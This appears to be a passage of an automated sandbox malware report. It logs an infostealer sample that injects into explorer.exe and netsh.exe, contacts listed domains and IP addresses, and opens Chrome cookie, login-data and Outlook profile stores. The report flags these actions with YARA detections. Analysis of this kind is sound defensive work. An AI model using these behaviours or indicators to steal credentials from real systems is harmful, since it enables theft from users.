Source: C:\Windows\explorer.exe Domain query: www.eufidelizo.com
Source: C:\Windows\explorer.exe Domain query: www.lyonfinancialusa.com
Source: C:\Windows\explorer.exe Domain query: www.afterdarksocial.club
Source: C:\Windows\explorer.exe Network Connect: 192.185.217.47 80
Source: C:\Windows\explorer.exe Network Connect: 206.233.197.135 80
Source: C:\Windows\explorer.exe Network Connect: 162.214.129.149 80
Source: C:\Windows\explorer.exe Domain query: www.19t221013d.tokyo
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Section unmapped: C:\Windows\SysWOW64\netsh.exe base address: 1280000
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Section loaded: unknown target: C:\Users\user\AppData\Local\Temp\febcldoukq.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Section loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Section loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Thread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Thread register set: target process: 3324
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Thread register set: target process: 3324
Source: C:\Windows\SysWOW64\netsh.exe Thread register set: target process: 3324
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Process created: C:\Users\user\AppData\Local\Temp\febcldoukq.exe "C:\Users\user\AppData\Local\Temp\febcldoukq.exe" C:\Users\user\AppData\Local\Temp\uebzn.cef
Source: explorer.exe, 00000003.00000000.336598511.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.340255020.0000000005910000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.304065105.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000000.336598511.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.304065105.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.356385901.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: uProgram Manager*r
Source: explorer.exe, 00000003.00000000.336598511.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.304065105.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.356385901.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000003.00000000.336598511.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.304065105.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.356385901.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000003.00000000.303378350.0000000000878000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.356013433.0000000000878000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ProgmanLoc*U
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 1_2_00B1D945 cpuid 1_2_00B1D945
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 1_2_00B1D5D2 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 1_2_00B1D5D2
Source: C:\Users\user\Desktop\qHpeBvr9cR.exe Code function: 0_2_0040324F EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess, 0_2_0040324F

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe

Stealing of Sensitive Information

Source: Yara match File source: 2.2.febcldoukq.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.febcldoukq.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.561579336.0000000001100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.395778723.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.393576373.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.559931003.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.369567476.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.347863799.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\netsh.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: C:\Windows\SysWOW64\netsh.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\netsh.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\netsh.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\netsh.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\netsh.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\netsh.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State

Remote Access Functionality

Source: Yara match File source: 2.2.febcldoukq.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.febcldoukq.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.561579336.0000000001100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.395778723.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.393576373.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.559931003.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.369567476.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.347863799.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY